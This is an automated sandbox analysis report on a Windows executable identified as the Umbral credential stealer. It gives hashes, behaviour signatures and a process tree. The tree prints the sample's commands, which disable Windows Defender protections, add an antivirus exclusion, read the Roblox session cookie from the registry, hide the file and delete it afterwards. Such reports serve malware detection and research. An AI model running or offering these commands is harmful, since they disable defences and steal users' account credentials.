Overview

overview

10

Static

static

10

fd5d2801e2...0N.exe

windows7-x64

10

fd5d2801e2...0N.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    15-08-2024 15:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fd5d2801e25b13aa35b9e5cc40103690N.exe

  • Size

    231KB

  • MD5

    fd5d2801e25b13aa35b9e5cc40103690

  • SHA1

    9bafc097f3f22caaacfb262dbe9bb4404c65a5d6

  • SHA256

    09a094b3db589ae741341a5b319dd0baa2f3a22695363df32e76a62d319e49ee

  • SHA512

    1f9e1f6d5de55c790361a95b9a5ab627617cafc9dd34a72fdf0dd0878b129423779d1006c2e5aa0ecc90b90500b12d6f6910cab0b81dd0f68bb0f0b670620761

  • SSDEEP

    6144:xloZM3fsXtioRkts/cnnK6cMlh6gQdwwVLxCqVGQhTuOLf2b8e1mZgQi:DoZ1tlRk83Mlh6gQdwwVLxCqVGQhTuO

Score
10/10
umbralcredential_accessdiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\fd5d2801e25b13aa35b9e5cc40103690N.exe
    "C:\Users\Admin\AppData\Local\Temp\fd5d2801e25b13aa35b9e5cc40103690N.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2488
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1696
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\fd5d2801e25b13aa35b9e5cc40103690N.exe"
      2⤵
      • Views/modifies file attributes
      PID:2804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fd5d2801e25b13aa35b9e5cc40103690N.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2832
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:916
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1184
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:904
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:776
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2148
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\fd5d2801e25b13aa35b9e5cc40103690N.exe" && pause
          2⤵
          • Deletes itself
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2500
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1032

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BET9YS0UGSIEPF3JPUBH.temp
        Filesize

        7KB

        MD5

        07fed48cd8c2d48dd6b61790abd0caab

        SHA1

        873c951fa40427fa9f5b7e5b0466f6e5e57e2fc8

        SHA256

        e9b5ddb28071f68b9bbdb21ee341c7f836981b8a660fff348bb88cbb08700ceb

        SHA512

        3b6d3d2a2aa5e0867ecab85f7425341ebd3b977bbfa927343f4606f02d274427726e30353137f86907812514793245abed8aba9565c57fccd4dda53599e3f3a2

        Download Submit

      • memory/776-43-0x00000000029F0000-0x00000000029F8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2488-0-0x000007FEF5DB3000-0x000007FEF5DB4000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2488-1-0x0000000001280000-0x00000000012C0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2488-2-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2488-47-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2832-7-0x000000001B650000-0x000000001B932000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2832-8-0x00000000028E0000-0x00000000028E8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2884-14-0x000000001B800000-0x000000001BAE2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2884-15-0x0000000002240000-0x0000000002248000-memory.dmp

        Filesize

        32KB

        Download